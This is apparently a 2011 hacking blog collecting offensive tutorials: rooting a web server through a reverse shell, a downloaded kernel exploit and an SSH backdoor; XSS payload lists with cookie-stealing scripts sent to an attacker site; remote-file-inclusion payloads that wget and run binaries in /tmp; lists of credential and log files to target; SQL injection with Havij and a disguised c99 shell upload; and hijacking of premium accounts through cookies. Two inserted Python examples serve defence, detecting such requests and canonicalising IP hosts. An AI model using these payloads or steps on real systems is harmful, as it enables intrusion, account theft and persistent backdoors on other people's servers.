Tuesday 27 December 2011

Learn Root - Totally Explained






# So Let's Start...

These are some basic questions I asked myself as a n00b :P

# What is rooting?
A. Getting access to the user => "root", the main admin of the site.


# What is the need for rooting?
A. Getting master admin privileges on servers.



Things you need



# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain

You can simply search http://www.google.com for these, except BRAIN and SHELL.



Getting Back Connection to the servers


Open a command prompt and go to the NetCat path. Type
"cd netcat.exe"

OK, open your shell in your browser and go to the back connection tab. If it is not there, get a shell like "WSO 2.3" or any other;
that's your choice....

Specify your "ip & port as 2121" and press connect. Now you'll get a shell to the server, and you can give commands to the server through that shell.

Now come back to netcat and type "nc -l -v -p 2121"

It will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...


Getting a Right exploit for the servers


Type: uname -a and hit enter.
It'll look something like this:

Code:
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

Note that it shows the kernel version of the server is 2.6.18-194.26.1.el5
and the year is 2010.

You need to find a perfect exploit for it. You can find them at:
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com


Compiling & executing exploits


Now I've got an exploit, and it is written in C, so I can't execute it just by uploading it; I need to compile it.

Before proceeding further, cd into the tmp directory, because it is always writable. So type: cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, so I type: wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just using it to show you.
It'll look something like this:

Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'



Now change the permission of the exploit to 777.
Type: "chmod 777 exploit.c"

Now the exploit is on my server; I just need to compile and execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile and save the exploit as >> exploit

The next step is to execute it, so we'll type: "./exploit"


Here it'll show different processes...
: #
: #
got root you m0f0 !! [<example]


Now it says got root. Let's check whether it is true.
Type: "whoami"

Then it will say
 "root"

like: uid=0(root) gid=0(root) groups=0(root)

Type "su" to get full privileges!


Installing Backdoors

Type: "wget http://www.urlofbackdoor.com/sshdoor.zip"


Then type,
unzip sshdoor.zip
Then, => cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.

Now connect with PuTTY and enjoy root privileges.


Methods to execute exploits written in other languages


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------


Just for Education Purpose !!

Saturday 22 October 2011

Common ways possible XSS, SQL, PHP-inj ....


Sometimes it happens that we have a site that is vidm CSU, but do not know how to use injections, below I present the most extended ones and not injection ...

XSS
</ Textarea> <script> alert (/ xss /) </ script>
</ Title> <script> alert (/ xss /) </ script>
<script src=http://yoursite.com/your_files.js> </ script>
"> <script> Alert (0) </ script>
<IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))>
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<marquee> <script> alert ('XSS') </ script> </ marquee>
<? echo ('<scr)';echo('ipt> alert (\ "XSS \") </ script>');?>
<style> @ im \ port '\ ja \ vasc \ ript: alert (\ "XSS \ ")';</ style>
<img src=foo.png onerror=alert(/xssed/) />
<script> alert (String.fromCharCode (88,83,83)) </ script>
<Scr <script> ipt> alert ('XSS');</ scr </ script> ipt>
<script>location.href="http://www.yourevilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
<script src="http://www.yourevilsite.org/cookiegrabber.php"> </ script>
<script> alert ('XSS');</ script>
<script> alert (1); </ script>
<IMG LOWSRC = \ "javascript: Alert ('XSS') \ ">
<IMG DYNSRC = \ "javascript: Alert ('XSS') \ ">
<font style='color:expression(alert(document.cookie))'>
<Img src = "javascript: Alert ('XSS') ">
<script language="JavaScript"> alert ('XSS') </ script>


<Body onunload = "javascript: Alert ('XSS');">
<Body onLoad = "alert ('XSS');"
[Color = red 'onmouseover = "alert (' xss')"] mouse over [/ color]
"/></ A ></>< img src = 1.gif onerror = alert (1)>
window.alert ("Bonjour!");
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">
<Iframe <? Php echo chr (11)?> Onload = alert ('XSS')></ iframe>
"> <Script alert (String.fromCharCode (88,83,83)) </ script>
'>> <marquee> <h1> XSS </ h1> </ marquee>
'">>< Script> alert ('XSS') </ script>
'">>< Marquee> <h1> XSS </ h1> </ marquee>
<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; url = javascript: Alert ('XSS'); \ ">
<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; URL = http://; URL = javascript: Alert ('XSS'); \ ">
<script> var var = 1; alert (var) </ script>
<STYLE Type="text/css"> BODY {background: url ("javascript: Alert ('XSS')")}</ STYLE>

<?='< SCRIPT> alert ("XSS") </ SCRIPT> '?>
<IMG SRC = 'vbscript: Msgbox (\ "XSS \") '>
"Onfocus = alert (document.domain)"> <"
<FRAMESET> <FRAME SRC = \ "javascript: Alert ('XSS'); \ "> </ FRAMESET>
<STYLE> Li {list-style-image: url (\ "javascript: Alert ('XSS') \ ");}</ STYLE> <UL> <LI> XSS
perl-e 'print \ "<SCR\0IPT> alert (\" XSS \ ") </ SCR \ 0IPT> \";'> out
perl-e 'print \ "<IMG SRC=java\0script:alert(\"XSS\")> \";'> out
<br size=\"&{alert('XSS')}\">

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Apache



conf


/usr/local/etc/apache/vhosts.conf

php.ini



CPanel:
* Log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
* Conf
/var/cpanel/cpanel.config


MySQL:
* Log
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
* Conf
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf

MySQL (Windows):
+ log conf

C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
C:\Program Files\MySQL\data\hostname.err
C:\Program Files\MySQL\data\mysql.log
C:\Program Files\MySQL\data\mysql.err
C:\Program Files\MySQL\data\mysql-bin.log
C:\MySQL\data\hostname.err
C:\MySQL\data\mysql.log
C:\MySQL\data\mysql.err
C:\MySQL\data\mysql-bin.log
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\my.cnf
C:\MySQL\my.ini
C:\MySQL\my.cnf

FTP


ProFTPD:
* Log
/etc/logrotate.d/proftpd
/www/logs/proftpd.system.log
/var/log/proftpd
* Conf
/etc/proftp.conf
/etc/protpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/proftpd/modules.conf

vsftpd:
* Log
/var/log/vsftpd.log
/etc/vsftpd.chroot_list
/etc/logrotate.d/vsftpd.log
* Conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd.conf
/etc/chrootUsers

wu-ftpd:
* Log
/var/log/xferlog
/var/adm/log/xferlog
* Conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers

Pure-FTPd:
* Conf
/usr/sbin/pure-config.pl
/usr/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/etc/pure-ftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pure-ftpd/pureftpd.pdb
DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/
OpenBSD: /usr/ports/net/pure-ftpd/
NetBSD: /usr/pkgsrc/net/pureftpd/
Crux Linux: /usr/ports/contrib/pure-ftpd/
* Log
/var/log/pure-ftpd/pure-ftpd.log
/logs/pure-ftpd.log
/var/log/pureftpd.log

Other:
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy
/var/log/ftplog
/etc/logrotate.d/ftp
/etc/ftpchroot
/etc/ftphosts

Mail Server


/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/maillog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_rejectlog


PHPMyAdmin

Target
PHPMyAdmin
Files Requested
/ PMA / main.php
/ Admin / main.php
/ Admin / mysql / main.php
/ Admin / phpmyadmin / main.php
/ Admin / pma / main.php
/ Db / main.php
/ Dbadmin / main.php
/ Main.php
/ Myadmin / main.php
/ Mysql-admin/main.php
/ Mysql / main.php
/ Mysqladmin / main.php
/ PhpMyAdmin-2.2.3/main.php
/ PhpMyAdmin-2.2.6/main.php
/ PhpMyAdmin-2.5.1/main.php
/ PhpMyAdmin-2.5.4/main.php
/ PhpMyAdmin-2.5.6/main.php
/ Phpmyadmin / main.php
/ Phpmyadmin2/main.php
/ Web / phpMyAdmin / main.php
/ PMA / read_dump.php
/ Db / read_dump.php
/ Dbadmin / read_dump.phpv / myadmin / read_dump.php
/ Mysql / read_dump.php
/ Mysqladmin / read_dump.php
/ PhpMyAdmin% 202.6.4-pl4/read_dump.php
/ PhpMyAdmin% 202.7.0-beta1/read_dump.php
/ PhpMyAdmin% 202.7.0-pl1/read_dump.php
/ PhpMyAdmin% 202.7.0-rc1/read_dump.php
/ PhpMyAdmin% 202.7.0/read_dump.php
/ PhpMyAdmin-2.2.3/read_dump.php
/ PhpMyAdmin-2.2.7-pl1/read_dump.php
/ PhpMyAdmin-2.5.6/read_dump.php
/ PhpMyAdmin-2.5.7-pl1/read_dump.php
/ PhpMyAdmin-2.6.0-pl3/read_dump.php
/ PhpMyAdmin-2.6.0/read_dump.php
/ PhpMyAdmin-2.6.1-pl3/read_dump.php
/ PhpMyAdmin-2.6.3-pl1/read_dump.php
/ PhpMyAdmin-2.6.4/read_dump.php
/ Phpadmin / read_dump.php
/ Phpmyadmin / read_dump.php
/ Phpmyadmin1/read_dump.php
/ Phpmyadmin2/read_dump.php
/ Typo3/phpmyadmin/read_dump.php
/ Web / phpMyAdmin / read_dump.php
/ Xampp / phpmyadmin / read_dump.php

Some PHP scripts

/ DE/index2.php
/ FR/index2.php
/ NL/index2.php
/ US/index2.php
/ Cms / index.php
/ Cms/index2.php
/ Cvs / index.php
/ Cvs/index2.php
/ Index.php
/ Index2.php
/ Mambo / index.php
/ Mambo/index2.php
/ Mb / index.php
/ Mb/index2.php
/ Site/index2.php
/ V1/index2.php
/ V2/index2.php
/ V3/index2.php

phpBB

/ Modules / Forums / admin / admin_styles.php
/ Forums / admin / admin_styles.php
/ Includes / functions.php
/ Includes / functions_nomoketos_rules.php
/ Modules / Forums / admin / admin_mass_email.php
/ Modules / Forums / admin / index.php
phpbb_root_path = http://XXX.XXX.XX.XX/cmd.dat?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/cbac; chmod% 20 744% 20cbac;. / cbac; echo% 20YYY; echo |

Coppermine


Target
Coppermine
Files Requested
/ Modules / coppermine / themes / default / theme.php
Payload
THEME_DIR = http://XXX.XXX.XX.XX/cmd.gif?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/cbac; chmod% 20 744% 20cbac;. / cbac; echo% 20YYY; echo |

Mambo / Joomla Content Management System
/ Index.php
/ Index2.php
/ Mambo/index2.php
/ Cvs/index2.php
/ Cvs/mambo/index2.php
/ Php/mambo/index2.php
/ Cbcms / mod_cbsms_messages.php
/ Components / com_extcalendar / admin_events.php
/ Components / com_forum / download.php
/ Components / com_galleria / galleria.html.php
/ Components / com_hashcash / server.php
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/ Components / com_loudmounth / includes / abbc / abbc.class.php
/ Components / com_pcchess / include.pcchess.php
/ Components / com_pccookbook / pccookbook.php
/ Components / com_performs / performs.php
/ Components / com_pollxt / conf.pollxt.php
/ Components/com_rsgallery2/rsgallery.html.php
/ Components / com_smf / smf.php
/ Components / com_simpleboard / file_upload.php
/ Components / com_sitemap / sitemap.xml.php
/ Components / com_videodb / core / videodb.class.xml.php
/ Mod_cbsms_messages.php
Payload
_REQUEST [Option] = com_content
_REQUEST [Itemid] = 1
GLOBALS =
mosConfig_absolute_path = http://XXX.XXX.XX.XX/cmd.gif?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/micu; chmod% 20 744% 20micu;. / micu; echo% 20YYY; echo |
CONFIG_EXT [LANGUAGES_DIR] = http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path = http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id

Wordpress, Drupal and others ...

/ Blog / xmlrpc.php
/ Blog / xmlsrv / xmlrpc.php
/ Blogs / xmlsrv / xmlrpc.php
/ Drupal / xmlrpc.php
/ Phpgroupware / xmlrpc.php
/ Wordpress / xmlrpc.php
/ Xmlrpc.php
/ Xmlrpc / xmlrpc.php
/ Xmlsrv / xmlrpc.php

AWStats

/ Awstats / awstats.pl
/ Cgi-bin/awstats.pl
/ Cgi-bin/awstats/awstats.pl
Payload
configdir = | echo; echo% 20YYY; cd% 20% 2ftmp% 3bwget% 20XX X% 2eXXX% 2eXX% 2eXX% 2fmirela% 3bchmod% 20% 2bx% 20mirela%

3b% 2e% 2fmirela; echo% 20YYY; echo |
Microsoft Applications / Extensions
Code:
/ 5c/_vti_bin/owssvr.dll
/ 5c/MSOffice/cltreq.asp
Payload
UL = 1 & ACT = 4 & BUILD = 6551 & STRMVER = 4 & CAPREQ = 0

DBImageGallery


/ Admin / attributes.php
/ Admin / images.php
/ Admin / scan.php
/ Includes / attributes.php
/ Includes / db_utils.php
/ Includes / images.php
/ Includes / utils.php
/ Includes / values.php
Payload
donsimg_base_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

DBGuestbook

/ Includes / guestbook.php
/ Includes / utils.php
/ Includes / views.php
Payload
dbs_base_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
Ultimate Fun Book
Code:
/ Board / / function.php
/ Funboard / function.php
/ Function.php
Payload
gbpfad = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /


Sinapis Forum CMS

/ Sinapis.php
/ Forum / / sinapis.php
/ FO / sinapis.php
Payload
fuss = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

Admin Phorum

PhpForums Admin Phorum
Files Requested
/ Actions / del.php
Payload
include_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
PMB Services
Code:
/ Cnl_prod / pmb / opac_css / includes / resa_func.inc.php
/ Pmb / opac_css / includes / resa_func.inc.php
/ Opac_css / includes / resa_func.inc.php
Payload
class_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
PHP-MIP
Code:
/ Php / top.php
/ Phpmip / / top.php
/ Top.php
Payload
laypath = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

SendStudio

Files Requested
/ Sendstudio / admin / includes / createemails.inc.php
/ Sendstudio / admin / includes / send_emails.inc.php
Payload
ROOTDIR = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
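
Added example, not part of the original post: the request records above share a few shapes that can be matched in access logs, namely an include-path parameter set to a remote URL, a `cmd=` or `configdir=` value carrying a shell chain, and `../` traversal toward system files. The log lines are constructed, `view.php?page=` is a hypothetical parameter, and the addresses come from the 192.0.2.0/24 documentation range.

```python
import re
from urllib.parse import unquote, urlsplit

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
SHELL_CHAIN = re.compile(r"(?:^|[;|&]\s*)(?:cd\s+/tmp|wget\s|curl\s|chmod\s)", re.I)
TRAVERSAL = re.compile(r"(?:\.\./){2,}")
SENSITIVE = re.compile(
    r"etc/(?:passwd|shadow)|httpd\.conf|php\.ini|(?:access|error)[._]log", re.I
)

# Constructed access-log lines in common log format.
SAMPLE_ACCESS_LOG = """\
192.0.2.44 - - [22/Oct/2011:10:00:01 +0000] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120
192.0.2.45 - - [22/Oct/2011:10:00:02 +0000] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://192.0.2.10/cmd.gif?&cmd=cd%20/tmp;wget%20192.0.2.10/micu;chmod%20744%20micu HTTP/1.1" 200 312
192.0.2.46 - - [22/Oct/2011:10:00:03 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%3Becho%20YYY%3Bcd%20%2ftmp%3Bwget%20192.0.2.10%2fmirela%7C HTTP/1.0" 200 90
192.0.2.47 - - [22/Oct/2011:10:00:04 +0000] "GET /view.php?page=..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1800
"""


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252f) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(uri):
    """Return the sorted list of findings for one request URI."""
    parts = urlsplit(uri)
    values = [decode(parts.path)]
    # Split on "&" only: the shell chains carry ";" inside a single value.
    for pair in parts.query.split("&"):
        values.append(decode(pair.partition("=")[2]))
    findings = set()
    for value in values:
        if REMOTE_URL.match(value):
            # A parameter whose whole value is a URL; allow-list known redirects.
            findings.add("remote-include")
        if SHELL_CHAIN.search(value):
            findings.add("shell-chain")
        if value.lstrip().startswith("|"):
            findings.add("pipe-injection")
        if TRAVERSAL.search(value):
            findings.add(
                "traversal-sensitive" if SENSITIVE.search(value) else "traversal"
            )
    return sorted(findings)


def scan(log_text):
    """Return (client, path, findings) for every request that matched a rule."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        findings = inspect_request(match.group(2))
        if findings:
            hits.append((match.group(1), urlsplit(match.group(2)).path, findings))
    return hits


if __name__ == "__main__":
    for client, path, findings in scan(SAMPLE_ACCESS_LOG):
        print(client, path, ", ".join(findings))
```

The status code tells you how far a matched request got: a 200 on a `remote-include` hit is worth checking against the application's include settings (for PHP, `allow_url_include` should be off).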
 


SQL


XSS



XML



Traversal
 


IRIX:

/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix

AIX:

/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog

SunOS:

/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log

Linux:

/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/root/.ksh_history
/root/.bash_history
/root/.bash_logout
/var/log/wtmp
/etc/wtmp
/var/run/utmp
/etc/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/usr/local/apache/log
/usr/local/apache/logs
/var/log/acct
/var/log/xferlog
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth

Red Hat, Mac OS X

/var/log/httpd/access_log
/var/log/httpd/error_log

Solaris

/var/apache/logs/access_log
/var/apache/logs/error_log

SuSE Linux Enterprise Server

/var/log/httpd/access_log
/var/log/httpd/error_log

Lampp

/opt/lampp/logs/error_log
/opt/lampp/logs/access_log

Debian

/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log

FreeBSD

/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log

OpenBSD

/var/www/log/access_log
/var/www/log/error_log

Friday 23 September 2011

Get Free YouTube Views

OK, here's what you do: FIRST sign up by clicking HERE

Then click Surf, located on the top right.

Leave it up over night and you'll get big numbers after a couple of days xD




When you have enough credits, go to your "control panel", then "My Videos", and add your video with views.

Works great for me 

Saturday 17 September 2011

How To USE Cookies In Firefox With pics N00b Friendly


Step 1. Start Firefox.

Step 2. Go to Tools.

Step 3. There, go to Add-ons.

Step 4. In Add-ons, press Get Add-ons.

Step 5. Search for "cookie".

Step 6. Install the one named "Edit Cookies" and restart Firefox.

Step 7. Then go to the filehost site you want to log in to as premium.

Step 8. Log in with a non-premium account.

Step 9. Go to Tools again and select "Edit cookie" from the bottom.

Step 10. When you open it there is an empty box; put "megaupload" in there, then press the Filter/refresh button.

Step 11. In there you should see a cookie named "user". Click on it and then click on the "edit" button.

Step 12. An "add/edit cookie" window should then pop up. Fill in the content you have been given.

Step 13. Then just press "save". Close the cookie editor.

Step 14. Refresh the site and there it is: premium account.





For Other Websites Use These Locations

megaupload.com....................user
hotfile.com.......................auth
rapidshare.com....................enc
netload.in........................cookie_user
depositfiles.com..................autologin
oron.com..........................xfss
filesonic.com.....................PHPSESSID
fileserve.com.....................PHPSESSID


Cheers Friends

Friday 16 September 2011

Web Bypass Tutorial

In this tutorial I'll be showing you how to bypass a filtered network just by following some simple steps. Instead of using a proxy server that uses non-standard ports, I'll be showing you another exploit that is easier. We'll use the exploit found in the URL mechanism itself. The idea works as follows:

Convert the URL to an IP address, then to its binary representation, and from there to an equivalent number. This kind of exploit can be used commonly on Mozilla and Netscape. Enjoy bypassing websites at your college, though I don't hold any responsibility for how you use this information whatsoever.

Use at your own risk !!!

Keep in mind that there are two kinds of filtered network: the software side and the hardware side. In this tutorial we'll be introducing the software side.


Step 1: 
Get the IP address for the web site you need to bypass.

For example, undergroundsystems (Underground Systems) blocked in Web-content filtering software has this IP address: 72.29.78.187

I obtained the web domain IP address by pinging the site in command prompt console.


Step 2: 
Convert each individual number in the IP address to an eight-digit binary number.

Note: Numbers having fewer than eight digits in their binary form must be padded with leading zeros to fill in the missing digits. For example, the binary number 1 is padded to 00000001 by adding seven zeros before the number one.

Each IPv4 address is a 32-bit binary number, 4 bytes in total. So we need to convert each decimal number of the dotted quad to its 8-bit binary form.

For each number:

72 = 01001000

29 = 00011101

78 = 01001110

187 = 10111011

The Windows Calculator can automatically convert numbers from decimal to binary notation:

i. Choose View -> Scientific.
ii. Click the Dec option button.
iii. Enter the number in decimal value.
iv. Click the Bin option button to show the number in binary format.


Step 3: 
Assemble the four 8-digit binary numbers into one 32-digit binary number.

01001000000111010100111010111011

Note: Don't add the binary numbers. Just organize them in the same order as the original IP address without the separating periods.


Step 4: 
Convert the 32-digit binary number to a decimal number.

For example, the 32-digit binary number 01001000000111010100111010111011 is equal to the decimal number 1209880251.


The decimal number doesn't need to be padded to a specific length.

Step 5:
Plug the decimal number into the Web browser's address field, like this:

http://1209880251

Voilà, the Web page loads, easy as pie!

Note: The preceding steps will not bypass URLs in Internet Explorer (though in some cases it still works).

Countermeasures.

If the bypassing of certain Web-content filters is an issue for your network, ask your content-filtering vendor if it has a solution for it :p
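A filter that compares the host as a plain string misses the decimal form built in Steps 1 to 5. The following is an added example, not part of the original post: it canonicalises numeric IPv4 host spellings before the block-list lookup, and goes beyond the tutorial's single decimal case by also covering hex, octal and short dotted forms. The function names and `blocked.example` are assumptions; the IP address is the one used in the tutorial.

```python
import ipaddress
from urllib.parse import urlsplit

# Block list as a content filter might hold it. The IP is the tutorial's
# example address; the host name is a constructed placeholder.
BLOCKED_IPS = {"72.29.78.187"}
BLOCKED_NAMES = {"blocked.example"}


def _parse_component(text):
    """Parse one dot-separated component the way inet_aton() does:
    0x prefix = hex, leading 0 = octal, otherwise decimal."""
    text = text.lower()
    if text.startswith("0x"):
        digits, base = text[2:], 16
    elif len(text) > 1 and text.startswith("0"):
        digits, base = text[1:], 8
    else:
        digits, base = text, 10
    allowed = "0123456789abcdef"[:base]
    if not digits or any(ch not in allowed for ch in digits):
        raise ValueError(f"not a number: {text!r}")
    return int(digits, base)


def canonical_ipv4(host):
    """Return the dotted-quad form of any numeric IPv4 spelling, or None
    when the host is not a numeric address (i.e. it is a DNS name)."""
    parts = host.rstrip(".").split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        numbers = [_parse_component(p) for p in parts]
    except ValueError:
        return None
    *leading, last = numbers
    # Leading components are single bytes; the last one fills the rest.
    if any(n > 255 for n in leading) or last >= 256 ** (4 - len(leading)):
        return None
    value = last
    for index, byte in enumerate(leading):
        value |= byte << (8 * (3 - index))
    return str(ipaddress.IPv4Address(value))


def naive_is_blocked(url):
    """String comparison only: the check the tutorial's steps get past."""
    host = urlsplit(url).hostname or ""
    return host in BLOCKED_IPS or host in BLOCKED_NAMES


def is_blocked(url):
    """Canonicalise the host first, then consult the block list."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    ip = canonical_ipv4(host)
    if ip is not None:
        return ip in BLOCKED_IPS
    return host in BLOCKED_NAMES


if __name__ == "__main__":
    for url in ("http://72.29.78.187/", "http://1209880251",
                "http://0x481d4ebb/", "http://0110.035.0116.0273/",
                "http://allowed.example/"):
        print(f"{url:30} naive={naive_is_blocked(url)} "
              f"canonical={is_blocked(url)}")
```
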


Happy Hacking

How to change your MAC address

There are many reasons why you might choose to change your MAC address. Here is a guide on how to do it!

Linux:
Find the MAC address of your machine by typing this in terminal:
ifconfig -a | grep HWaddr

Then, sign in as root and do the following:

ifconfig eth0 down
ifconfig eth0 hw ether [NEW MAC ADDRESS HERE]
ifconfig eth0 up
ifconfig eth0 |grep HWaddr

Your new MAC address can be any 48-bit hexadecimal address.

Windows:
Pull up your windows menu, then go to Control Panel > Hardware and Sound > Device Manager > expand the Network Adapters section and pick your network device. Right click on it and choose properties. When a box pops up, go to the Advanced tab, select “Network Address” in a list, and select the radio button next to the blank Value field and enter the new MAC address.

Keep in mind:
Changing your MAC address is not permanent. After rebooting your computer, the machine will show the MAC address burnt into your network card, not the one you chose.

Sunday 11 September 2011

How To Sqli a website Using Software N00b Friendly

Things You Need
Havij
C99 Shell
and
Adminpage Finder

now open Havij and enter your website in the url bar


http://img201.imageshack.us/img201/502/havij.png


and then push the analyze button
http://img3.imageshack.us/img3/2849/havij2.png
You Should See this afterwards
http://img534.imageshack.us/img534/3374/havij3.png
and then push the tables button and you will see the database
http://img203.imageshack.us/img203/2108/havij4.png
now click the Get Tables Button
http://img38.imageshack.us/img38/9885/havij5.png
now click on the user table and click Get Columns
http://img709.imageshack.us/img709/7464/havij6.png
Now Click On The User And Password Column And Push Get Data
http://img245.imageshack.us/img245/6780/havij7.png
The First Username And Password You See Should Be The Administrator
Now Open Your Admin Page Finder And Put In The URL
http://img408.imageshack.us/img408/6821/havij8.png
And Click The Scan Button
http://img821.imageshack.us/img821/4236/havij9.png
Once You find The Page visit It in your web browser
http://img96.imageshack.us/img96/7394/havij10.png
Now Login With The Username And Pass You found in the database
Now if your website is a CMS like mine, there should be a sidebar
or navigation menu somewhere, and there's always a place to
upload images, in my case the news
[Image: havij11.png]
Now Rename the c99 script ANYTHING.PHP.JPG and upload it
http://img138.imageshack.us/img138/6862/havij12.png
now find the directory where the images are and go to your shell
http://img822.imageshack.us/img822/3851/havij13.png
And Now You're Done

